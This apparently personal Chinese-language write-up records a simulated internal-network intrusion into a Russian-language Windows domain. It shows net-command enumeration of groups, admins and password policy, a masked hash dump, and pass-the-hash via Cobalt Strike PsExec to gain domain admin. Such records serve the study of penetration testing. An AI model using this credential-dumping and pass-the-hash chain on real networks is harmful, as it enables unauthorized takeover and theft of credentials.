一次获得域管的过程记录

最近在学习内网渗透，这只是一次模拟测试，记录一下过程。前面的过程就不描述了，从CMD shell开始。

过程

Command : net view /domain

查看域

Домен  ------------------------------------------------------------------------------- DI****                  Команда выполнена успешно. 

Command : net group /domain

查看域中的用户组

.....省略 *none *RTCDomainServerAdmins *RTCUniversalServerAdmins *Администраторы домена *Администраторы предприятия *Администраторы схемы *Владельцы-создатели групповой политики *Гости домена *Издатели сертификатов *Компьютеры домена *Контроллеры домена *Контроллеры домена - только чтение *Контроллеры домена предприятия - только чтение *Пользователи домена Команда выполнена успешно. 

根据上面的命令中获得域下的所有用户组，发现用户组名为 “Администраторы домена” 是域管用户组，通过这个用户组查看域管成员

Command : net group “Администраторы домена” /domain

Этот запрос будет обрабатываться контроллером домена DI****.local.  Имя группы      Администраторы домена Комментарий     Назначенные администраторы домена  Члены  ------------------------------------------------------------------------------- d2                       d3                       it***                 refugee                  Администратор             Команда выполнена успешно. 

获得域管用户：d2、d3、it***、refugee、Администратор

Command : net user d2 /domain

查看d2用户的信息

Имя пользователя                       d2 Полное имя                             Дмитрий Соловьёв Комментарий                             Комментарий пользователя                Код страны                             000 (Стандартный системный) Учетная запись активна                 Yes Учетная запись просрочена              Никогда  Последний пароль задан                 22.03.2017 10:22:50 Действие пароля завершается            Никогда Пароль допускает изменение             22.03.2017 10:22:50 Требуется пароль                       Yes Пользователь может изменить пароль     Yes  Разрешенные рабочие станции            Все Сценарий входа                          Конфигурация пользователя               Основной каталог                        Последний вход                         23.10.2018 20:14:58  Разрешенные часы входа                 Все 

Command : net accounts /domain

获取域密码策略，密码长短，错误锁定 等信息

Этот запрос будет обрабатываться контроллером домена DI****.local.  Принудительный выход по истечении времени через:             Никогда Минимальный срок действия пароля (дней):                     0 Максимальный срок действия пароля (дней):                    Без ограничений Минимальная длина пароля:                                    0 Хранение неповторяющихся паролей:                            Нет Блокировка после ошибок ввода пароля:                        Никогда Длительность блокировки (минут):                             Никогда Сброс счетчика блокировок через (минут):                     30 Роль компьютера:                                             ОСНОВНОЙ Команда выполнена успешно. 

Command : net user

获取当前用户列表

Учетные записи пользователей для //M040-SQL  ------------------------------------------------------------------------------- ****                    ****                   Администратор             Гость                     Команда выполнена успешно. 

注意到上面列表中 Администратор 在域控用户组中（运气爆表～）

使用hashdump获得hash：

****:1009:aad3b435b51404eeaad3b435b51404ee::******:::::: ****:1011:aad3b435b51404eeaad3b435b51404ee::******:::::: Администратор:500:aad3b435b51404eeaad3b435b51404ee:******::: Гость:501:aad3b435b51404eeaad3b435b51404ee::******:::::: 

使用Cobalt Strike的PsExec进行hash传递攻击，弹回来一个Администратор用户的会话，成功获得域管：

Этот запрос будет обрабатываться контроллером домена DI****.local.  Имя пользователя                       Администратор Полное имя                              Комментарий                            Встроенная учетная запись администратора компьютера/домена Комментарий пользователя                Код страны                             000 (Стандартный системный) Учетная запись активна                 No Учетная запись просрочена              Никогда  Последний пароль задан                 22.03.2017 9:27:50 Действие пароля завершается            Никогда Пароль допускает изменение             22.03.2017 9:27:50 Требуется пароль                       Yes Пользователь может изменить пароль     Yes  Разрешенные рабочие станции            Все Сценарий входа                          Конфигурация пользователя               Основной каталог                        Последний вход                         Никогда  Разрешенные часы входа                 Все   Членство в локальных группах           *_****_                                                 *Администраторы         Членство в глобальных группах          *Пользователи домена                                          *Администраторы предпр //域管理员                                        *Администраторы домена                                        *Администраторы схемы                                         *Владельцы-создатели г Команда выполнена успешно.  

简单的结束了。。